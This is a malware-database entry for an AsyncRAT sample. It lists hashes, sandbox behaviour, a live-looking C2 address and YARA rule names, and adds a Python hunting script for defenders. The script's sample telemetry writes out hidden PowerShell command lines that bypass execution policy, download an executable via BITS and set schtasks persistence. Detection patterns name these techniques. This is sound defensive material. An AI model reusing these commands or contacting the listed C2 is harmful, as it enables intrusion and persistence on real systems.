MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AsyncRAT


Vendor detections: 10



SHA256 hash: 630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7
SHA3-384 hash: 02b090b633e8271dba79a43b48c66a0b554bf04e15142331d30132919813eb0b99f37235f27fe0ee494df81deca37bcd
SHA1 hash: 9a5f2a032d56b7347781ff3baa7343bf3cc3f203
MD5 hash: f24ecd62c00dd9db120fd3d54b069960
humanhash: princess-paris-idaho-comet
File name: 630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC.exe
Download: download sample
Signature: AsyncRAT
File size: 45'401'235 bytes
First seen: 2024-01-21 15:35:31 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash 4d0fb8dc9ee470058274f448bebbb85f (4 x NodeLoader, 3 x Rhadamanthys, 3 x DogeStealer)
ssdeep 393216:R1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfL:RMguj8Q4Vfv7qFTrYwPP3
Threatray 92 similar samples on MalwareBazaar
TLSH T149A79C0773E60195E5B7D2388AA74507D773B8634331CADF329D06152FABAE09A7E720
TrID 63.5% (.EXE) Win64 Executable (generic) (10523/12/4)
12.2% (.EXE) OS/2 Executable (generic) (2029/13)
12.0% (.EXE) Generic Win/DOS Executable (2002/3)
12.0% (.EXE) DOS Executable Generic (2000/1)
File icon (PE): (icon image)
dhash icon f89efcf8f971f2e0 (9 x NodeLoader, 6 x Amadey, 6 x Plugx)
Reporter abuse_ch
Tags: AsyncRAT exe RAT


abuse_ch
AsyncRAT C2:
94.130.130.51:55

Intelligence


File Origin
# of uploads :
1
# of downloads :
380
Origin country :
NL
Vendor Threat Intelligence
Result
Verdict:
Malware
Maliciousness:

Behaviour
Running batch commands
Creating a process with a hidden window
Creating a file
Creating synchronization primitives
Creating a process from a recently created file
Creating a window
Sending a custom TCP request
Searching for the window
Launching a process
Transferring files using the Background Intelligent Transfer Service (BITS)
DNS request
Enabling the 'hidden' option for recently created files
Moving a recently created file
Using the Windows Management Instrumentation requests
Deleting a system file
Deleting a recently created file
Enabling autorun by creating a file
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-debug crypto evasive expand fingerprint lolbin overlay packed
Result
Verdict:
MALICIOUS
Result
Threat name:
AsyncRAT
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Signature
Benign windows process drops PE files
Bypasses PowerShell execution policy
Injects a PE file into a foreign processes
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell uses Background Intelligent Transfer Service (BITS)
Snort IDS alert for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected AsyncRAT
Yara detected Generic Downloader
Behaviour
Behavior Graph:
Behavior Graph ID: 1378299; Sample: 630DB15B4A855CA42E13666E204...; Startdate: 21/01/2024; Architecture: WINDOWS; Score: 100 (flattened from the rendered graph image; conhost.exe children omitted)
Root-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 3 other signatures
Network: nodejs.org 104.20.23.46:443 (CLOUDFLARENETUS, United States; local ports 49732, 49733); utorrent.theworkpc.com 94.130.130.51:55 (HETZNER-ASDE, Germany; local port 49740; contacted by aspnet_compiler.exe); 127.0.0.1 (unknown)
Files dropped by 630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC.exe: C:\Users\Public\Framework\node.exe (PE32+); C:\Users\Public\Framework\PowerRun.exe (PE32); C:\Users\Public\Framework\xx.dll (ASCII); 11 other malicious files
Dropped by one of the 3 other root processes (Benign windows process drops PE files): C:\Users\Public\Framework\BIT8068.tmp (PE32+)
Process tree (signatures in parentheses):
630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC.exe
  cmd.exe -> wscript.exe (Wscript starts Powershell (via cmd or directly)) -> cmd.exe (Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)) -> powershell.exe (Uses schtasks.exe or at.exe to add and modify task schedules; Powershell uses Background Intelligent Transfer Service (BITS)) -> node.exe -> cmd.exe (Wscript starts Powershell (via cmd or directly)) -> powershell.exe; the same powershell.exe also starts WmiPrvSE.exe and schtasks.exe
  cmd.exe -> 2 other processes (Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found) -> node.exe -> cmd.exe (Wscript starts Powershell (via cmd or directly)) -> powershell.exe
  cmd.exe (Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy)
  2 other processes
wscript.exe -> node.exe -> 2 other processes -> powershell.exe (Writes to foreign memory regions; Injects a PE file into a foreign processes) -> aspnet_compiler.exe -> utorrent.theworkpc.com 94.130.130.51:55; the same powershell.exe also starts 2 other processes
wscript.exe -> node.exe -> 2 other processes -> powershell.exe -> 2 other processes
3 other processes -> node.exe (two instances) -> 2 other processes each (Suspicious powershell command line found on one branch) -> powershell.exe -> aspnet_compiler.exe
Threat name:
Win32.Trojan.Generic
Status:
Malicious
First seen:
2023-12-13 04:04:26 UTC
File Type:
PE+ (Exe)
Extracted files:
12
AV detection:
15 of 24 (62.50%)
Threat level:
  2/5
Result
Malware family:
Score:
  10/10
Tags:
family:asyncrat family:zgrat botnet:tornew evasion rat trojan
Behaviour
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Enumerates physical storage devices
Suspicious use of SetThreadContext
Checks computer location settings
Downloads MZ/PE file
Async RAT payload
AsyncRat
Detect ZGRat V1
UAC bypass
ZGRat
Malware Config
C2 Extraction:
utorrent.theworkpc.com:55
Dropper Extraction:
https://nodejs.org/download/release/v6.17.1/win-x64/node.exe
Please note that we are no longer able to provide a coverage score for Virus Total.
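The sandbox signatures above (Wscript starts Powershell via cmd, PowerShell execution-policy bypass, PowerShell using BITS to fetch node.exe, schtasks persistence, PE injection into aspnet_compiler.exe, files staged under C:\Users\Public\Framework) together with the extracted C2 (utorrent.theworkpc.com / 94.130.130.51 on TCP 55) translate directly into hunting logic. The Python below is an added example written for this page, not MalwareBazaar's or any vendor's code. It walks a small set of constructed Sysmon-style process-create, network-connect and file-create events and reports which indicators fire; the PIDs, command lines and scheduled-task name are invented for the example, while the hashes, hostnames, IP, port, dropped paths and process names come from the entry. A Node.js install in its normal location talking to nodejs.org over TLS is included to show the rules stay quiet on it.

```python
"""Hunt for the AsyncRAT / NodeLoader chain from this MalwareBazaar entry.

Added example, not MalwareBazaar's or a vendor's code. EVENTS is constructed
to resemble Sysmon events (ID 1 process create, 3 network connect, 11 file
create); only the indicators themselves come from the entry.
"""
from __future__ import annotations

import ntpath

# --- indicators taken from the entry --------------------------------------
SAMPLE_HASHES = {
    "630db15b4a855ca42e13666e2046c639a4c2847e0d1fc52a4242ebc369ab26e7",  # SHA256
    "f24ecd62c00dd9db120fd3d54b069960",                                  # MD5
}
C2_HOSTS = {"utorrent.theworkpc.com", "94.130.130.51"}
C2_PORT = 55
DROP_DIR = "c:\\users\\public\\framework\\"   # staging directory from the sandbox run
INJECTION_TARGET = "aspnet_compiler.exe"      # "Injects a PE file into a foreign processes"

# --- constructed telemetry (PIDs, command lines, task name are invented) ---
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 10,
     "image": r"C:\Users\victim\Downloads\630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC.exe",
     "hashes": "MD5=F24ECD62C00DD9DB120FD3D54B069960,"
               "SHA256=630DB15B4A855CA42E13666E2046C639A4C2847E0D1FC52A4242EBC369AB26E7"},
    {"id": 11, "pid": 100, "target": r"C:\Users\Public\Framework\node.exe"},
    {"id": 11, "pid": 100, "target": r"C:\Users\Public\Framework\PowerRun.exe"},
    # sample -> cmd -> wscript -> cmd -> powershell, as in the behaviour graph
    {"id": 1, "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "pid": 102, "ppid": 101, "image": r"C:\Windows\System32\wscript.exe"},
    {"id": 1, "pid": 103, "ppid": 102, "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "pid": 104, "ppid": 103,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                '"Start-BitsTransfer -Source https://nodejs.org/download/release/v6.17.1/win-x64/node.exe '
                r'-Destination C:\Users\Public\Framework\node.exe"'},
    {"id": 1, "pid": 105, "ppid": 104, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /sc minute /mo 1 /tn Framework /tr C:\Users\Public\Framework\node.exe"},
    {"id": 1, "pid": 106, "ppid": 104,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"},
    {"id": 3, "pid": 106, "dest_ip": "94.130.130.51", "dest_port": 55,
     "dest_host": "utorrent.theworkpc.com"},
    # dropped node.exe launched by wscript from the staging directory
    {"id": 1, "pid": 108, "ppid": 102, "image": r"C:\Users\Public\Framework\node.exe"},
    # legitimate Node.js install fetching from nodejs.org over TLS: must stay quiet
    {"id": 1, "pid": 200, "ppid": 10, "image": r"C:\Program Files\nodejs\node.exe"},
    {"id": 3, "pid": 200, "dest_ip": "104.20.23.46", "dest_port": 443, "dest_host": "nodejs.org"},
]


def _name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return ntpath.basename(path).lower()


def _ancestor_names(procs: dict, pid: int) -> list:
    """Image names up the parent chain of pid, nearest first (cycle-safe)."""
    names, seen = [], set()
    cur = procs.get(pid)
    while cur is not None and cur["ppid"] in procs and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = procs[cur["ppid"]]
        names.append(_name(cur["image"]))
    return names


def hunt(events: list) -> list:
    """Return (rule, pid) pairs for every indicator that fires, in event order."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    hits = []
    for e in events:
        pid = e["pid"]
        if e["id"] == 1:
            img = _name(e["image"])
            cmd = e.get("cmdline", "").lower()
            parent = procs.get(e["ppid"])
            pname = _name(parent["image"]) if parent else ""
            hashes = {h.split("=", 1)[1].lower() for h in e.get("hashes", "").split(",") if "=" in h}
            if hashes & SAMPLE_HASHES:
                hits.append(("known_sample_hash", pid))
            if e["image"].lower().startswith(DROP_DIR):
                hits.append(("exec_from_public_framework", pid))
            if img == "powershell.exe":
                if "wscript.exe" in _ancestor_names(procs, pid):
                    hits.append(("wscript_to_powershell", pid))
                if "-executionpolicy bypass" in cmd or "-ep bypass" in cmd:
                    hits.append(("execpolicy_bypass", pid))
                if "start-bitstransfer" in cmd:
                    hits.append(("powershell_bits_download", pid))
            if pname == "powershell.exe" and img == INJECTION_TARGET:
                hits.append(("powershell_spawns_aspnet_compiler", pid))
            if pname == "powershell.exe" and img == "schtasks.exe" and "/create" in cmd:
                hits.append(("powershell_schtasks_persistence", pid))
        elif e["id"] == 3:
            if e.get("dest_host", "") in C2_HOSTS or e["dest_ip"] in C2_HOSTS:
                hits.append(("asyncrat_c2_connection", pid))
            elif e["dest_port"] == C2_PORT:
                hits.append(("tcp_port_55_connection", pid))  # weaker signal: port alone
        elif e["id"] == 11 and e["target"].lower().startswith(DROP_DIR):
            hits.append(("file_dropped_in_public_framework", pid))
    return hits


if __name__ == "__main__":
    for rule, pid in hunt(EVENTS):
        print(f"{pid:>5}  {rule}")
```

The hash match is the only indicator tied to this exact file; the chain rules (wscript ancestry of PowerShell, PowerShell spawning aspnet_compiler.exe, schtasks under PowerShell, execution from C:\Users\Public\Framework) survive a rebuild of the dropper and are the ones worth keeping after the hashes go stale. The port-only rule is deliberately second-tier, since nothing on the page suggests TCP 55 is specific to this family.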

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:adonunix2
Author:Tim Brown @timb_machine
Description:AD on UNIX
Rule name:APT_Bitter_ZxxZ_Downloader
Author:SECUINFRA Falcon Team (@SI_FalconTeam)
Description:Detects Bitter (T-APT-17) ZxxZ Downloader
Reference:https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh
Rule name:attack_India
Rule name:BitcoinAddress
Author:Didier Stevens (@DidierStevens)
Description:Contains a valid Bitcoin address
Rule name:BLOWFISH_Constants
Author:phoul (@phoul)
Description:Look for Blowfish constants
Rule name:Check_OutputDebugStringA_iat
Rule name:DebuggerCheck__API
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Glasses
Author:Seth Hardy
Description:Glasses family
Rule name:GlassesCode
Author:Seth Hardy
Description:Glasses code features
Rule name:ldpreload
Author:xorseed
Reference:https://stuff.rop.io/
Rule name:MD5_Constants
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:Mimikatz_Generic
Author:Still
Description:attempts to match all variants of Mimikatz
Rule name:QbotStuff
Author:anonymous
Rule name:reverse_http
Author:CD_R0M_
Description:Identify strings with http reversed (ptth)
Rule name:RIPEMD160_Constants
Author:phoul (@phoul)
Description:Look for RIPEMD-160 constants
Rule name:SEH__vectored
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:SHA1_Constants
Author:phoul (@phoul)
Description:Look for SHA1 constants
Rule name:SHA512_Constants
Author:phoul (@phoul)
Description:Look for SHA384/SHA512 constants
Rule name:upxHook
Author:@r3dbU7z
Description:Detect artifacts from 'upxHook' - modification of UPX packer
Reference:https://bazaar.abuse.ch/sample/6352be8aa5d8063673aa428c3807228c40505004320232a23d99ebd9ef48478a/
Rule name:WHIRLPOOL_Constants
Author:phoul (@phoul)
Description:Look for WhirlPool constants
Rule name:without_attachments
Author:Antonio Sanchez <asanchez@hispasec.com>
Description:Rule to detect the no presence of any attachment
Reference:http://laboratorio.blogs.hispasec.com/
Rule name:with_urls
Author:Antonio Sanchez <asanchez@hispasec.com>
Description:Rule to detect the presence of an or several urls
Reference:http://laboratorio.blogs.hispasec.com/
Rule name:yara_template

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments